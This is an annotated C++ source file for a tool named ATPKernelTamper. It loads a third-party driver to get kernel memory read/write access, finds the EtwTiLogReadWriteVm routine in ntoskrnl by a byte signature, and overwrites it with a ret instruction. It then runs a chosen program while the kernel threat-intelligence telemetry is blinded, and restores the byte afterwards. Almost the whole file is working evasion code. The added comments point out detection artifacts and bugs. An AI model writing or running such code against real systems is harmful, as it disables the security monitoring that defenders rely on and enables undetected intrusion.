// Byte pattern that main() searches for in the copy of the ntoskrnl image it
// reads through the driver; the byte that gets patched lies `backoffset`
// bytes before the match.  Presumably specific to one kernel build -- main()
// itself warns that a wrong version detection leads to a BSOD.
unsigned char signature[] = { 0x41 ,0x83 ,0xf9 ,0x10 ,0xb8 ,0x00 ,0x00 ,0x0c ,0x00 ,0x41 ,0xb8 ,0x00 ,0x00 ,0x03 ,0x00 };
// Distance, in bytes, from the start of the signature match back to the
// single byte that patchFunction() overwrites.
int backoffset = 76;
// Number of bytes read from the kernel ImageBase into the search buffer
// (0x1000000 = 16 MiB); also the size of the malloc() in main().
SIZE_T searchlen = 0x1000000;
// One entry of the loaded-module list returned by
// NtQuerySystemInformation(SystemModuleInformation) (see main()).  The layout
// must match what the kernel writes, so field order and sizes are not to be
// changed.  main() reads ImageBase, OffsetToFileName and FullPathName only.
typedef struct _RTL_PROCESS_MODULE_INFORMATION
{
    HANDLE Section;
    PVOID MappedBase;
    PVOID ImageBase;          // kernel virtual base of the module
    ULONG ImageSize;
    ULONG Flags;
    USHORT LoadOrderIndex;
    USHORT InitOrderIndex;
    USHORT LoadCount;
    USHORT OffsetToFileName;  // index into FullPathName of the bare file name
    UCHAR FullPathName[256];
} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;
// Header of the SystemModuleInformation buffer: a count followed by
// NumberOfModules entries.  Modules[1] is the classic "at least one"
// declaration; the real array runs past the end of the struct, which is why
// main() allocates a 1 MiB buffer for it rather than sizeof(RTL_PROCESS_MODULES).
typedef struct _RTL_PROCESS_MODULES
{
    ULONG NumberOfModules;
    RTL_PROCESS_MODULE_INFORMATION Modules[1];
} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;
// Overwrites a single byte of kernel memory using the loaded driver's
// read/write primitives and reports the old and new values.
//
// kernelbaseaddress  ImageBase of the kernel module as taken from the module list.
// pml4               directory base handed to read_/write_virtual_memory for the
//                    address translation (obtained from find_directory_base() in main()).
// offset             byte offset from kernelbaseaddress of the byte to patch.
// function_name      label used only in the printf() output.
// value              the byte written at the target address.
//
// Returns the byte that was at the address before the write, or 0x0 if any of
// the read or write calls fails.  main() feeds that return value back in to
// restore the original byte, so an original byte that is genuinely 0x00 cannot
// be told apart from a failure.  ghDriver is a driver handle defined outside
// this listing.
BYTE patchFunction(LPVOID kernelbaseaddress, uintptr_t pml4,int offset, const char* function_name, BYTE value)
{
    BYTE bres;
    BYTE bori;
    BYTE patch = value;
    uintptr_t size = 0;   // unused
    uintptr_t p = (uintptr_t)kernelbaseaddress + offset;
    // NOTE(review): %#x with a uintptr_t argument is a format mismatch on 64-bit
    // builds (PRIxPTR from <inttypes.h> would match); the printed address is truncated.
    printf("[+] %s address: %#x\n", function_name, p);
    // This first read's result is never examined; the read is repeated just
    // below into bori, which is the value actually used.
    BOOL result = read_virtual_memory(ghDriver, pml4, p, &bres, 1);
    if(!read_virtual_memory(ghDriver, pml4, p, &bori, 1))
    {
        return 0x0;
    }
    // The kernel text write itself -- this is the modification that kernel
    // integrity checks and patch-detection telemetry are meant to catch.
    if (!write_virtual_memory(ghDriver, pml4, p, &patch, 1))
    {
        return 0x0;
    }
    // Read back to confirm the write landed before reporting both values.
    if (read_virtual_memory(ghDriver, pml4, p, &bres, 1))
    {
        printf("[+] %s new value: %#x old value: %#x\n\n", function_name, bres, bori);
    }
    else
    {
        return 0x0;
    }
    return bori;
}
// Convenience overload (C++ overloading -- this file is not plain C): patches
// the target byte with 0xc3, the x86 `ret` opcode, so the patched function
// returns immediately when called.  Returns the original byte exactly as the
// five-argument overload does, for later restoration.
BYTE patchFunction(LPVOID kernelbaseaddress, uintptr_t pml4, int offset, const char* function_name)
{
    return patchFunction(kernelbaseaddress, pml4, offset, function_name, 0xc3);
}
// Entry point.  Loads a third-party driver ("gpcidrv64") as a kernel memory
// read/write primitive, locates a byte inside ntoskrnl.exe by signature, patches
// it, runs the binary given as argv[1] through system(), and then restores the
// byte and unloads the driver.  From a defender's point of view the observable
// artifacts are the driver service load/unload (and the registry entry it
// creates and removes) and the modification of kernel text; both are the kind
// of events driver-load auditing and kernel integrity protection exist for.
//
// argv[1]  path of the program to run while the patch is in place; only its
//          existence is checked, and it is passed to system() verbatim.
// Returns 0 in almost every case, including most failures; -1 only when the
// module list cannot be allocated or queried.
int main(int argc, char* argv[])
{
    printf("====== ATPKernelTamper ======\n");
    if(argc != 2)
    {
        printf("[-] Usage: ATPKernelTamper.exe binary\n");
        return 0;
    }
    if(!FileExists(argv[1]))
    {
        printf("[-] Binary file not found\n");
        return 0;
    }
    // so_check() is defined outside this listing; from the warning that follows
    // it presumably identifies the OS/kernel version the signature was made for.
    so_check();
    printf("[+] Please make sure your version is detected correctly. Incorrect version detection will leads to BSOD.\n");
    printf("[+] Press any key to proceed.\n");
    getchar();
    // NOTE(review): the malloc() result is never checked for NULL, and the
    // buffer is freed only on the successful-read path below; every other path
    // (driver failure, no ntoskrnl match, failed read) leaks it.
    VOID* buffer = malloc(searchlen);
    if (!LoadDriver())
    {
        printf("[-] Could not load driver, maybe lack of permission?\n");
        return 0;
    }
    if (!InitDriver()) {
        printf("[-] Could not get a handle to driver, is driver loaded?\n");
        // Driver was loaded but no handle could be opened: undo the load and
        // the service registry entry before giving up.
        Dl_UnloadDriver(L"gpcidrv64");
        Dl_RemoveDriverFromRegistry(L"gpcidrv64");
        return 0;
    }
    NTSTATUS status;
    ULONG i;
    PRTL_PROCESS_MODULES ModuleInfo;
    ModuleInfo = (PRTL_PROCESS_MODULES)VirtualAlloc(NULL, 1024 * 1024, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); // Allocate memory for the module list
    if (!ModuleInfo)
    {
        printf("\nUnable to allocate memory for module list (%d)\n", GetLastError());
        return -1;
    }
    // Enumerate loaded kernel modules to find the kernel image base.
    if (!NT_SUCCESS(status = NtQuerySystemInformation(SystemModuleInformation, ModuleInfo, 1024 * 1024, NULL)))
    {
        printf("\nError: Unable to query module list (%#x)\n", status);
        VirtualFree(ModuleInfo, 0, MEM_RELEASE);
        return -1;
    }
    for (i = 0; i < ModuleInfo->NumberOfModules; i++)
    {
        // Compare only the file-name part of the module path.
        if (strcmp((char *)(ModuleInfo->Modules[i].FullPathName + ModuleInfo->Modules[i].OffsetToFileName), "ntoskrnl.exe") == 0)
        {
            // NOTE(review): %#x with a PVOID argument is a format mismatch on
            // 64-bit builds; the printed address is truncated.
            printf("[+] Kernel address: %#x\n", ModuleInfo->Modules[i].ImageBase);
            uintptr_t pml4 = find_directory_base(ghDriver);
            printf("\n");
            // Copy the first `searchlen` bytes of the kernel image into buffer.
            BOOL result = read_virtual_memory(ghDriver, pml4, (uintptr_t)ModuleInfo->Modules[i].ImageBase, buffer, searchlen);
            if(result)
            {
                // NOTE(review): whatever searchSign() returns when the pattern
                // is absent is not checked; `offset - backoffset` is used as a
                // kernel offset regardless (DWORD arithmetic, so it can wrap).
                DWORD offset = searchSign((unsigned char*)buffer, signature, sizeof(signature));
                free(buffer);
                printf("[*] Offset %d\n", offset - backoffset);
                // Patch and keep the original byte so it can be put back afterwards.
                BYTE EtwTiLogReadWriteVmOri = patchFunction(ModuleInfo->Modules[i].ImageBase, pml4, offset - backoffset, "EtwTiLogReadWriteVm");
                printf("[+] Run your command now\n");
                // argv[1] goes through the command interpreter unquoted; the
                // patch stays in place for the whole lifetime of that process.
                int retCode = system(argv[1]);
                printf("\n\n");
                printf("[+] Execution finished with exit code: %d\n", retCode);
                printf("[+] Proceed to restore previous state.\n");
                // Restore; if the first patch failed this writes 0x00 rather
                // than the real original byte (see patchFunction's return contract).
                patchFunction(ModuleInfo->Modules[i].ImageBase, pml4, offset - backoffset, "EtwTiLogReadWriteVm", EtwTiLogReadWriteVmOri);
            }
            else
            {
                printf("[*] Errore reading kernel memory \n");
            }
        }
    }
    // ModuleInfo is not released on this path (only on the query-failure path above).
    CloseHandle(ghDriver);
    Dl_UnloadDriver(L"gpcidrv64");
    Dl_RemoveDriverFromRegistry(L"gpcidrv64");
    return 0;
}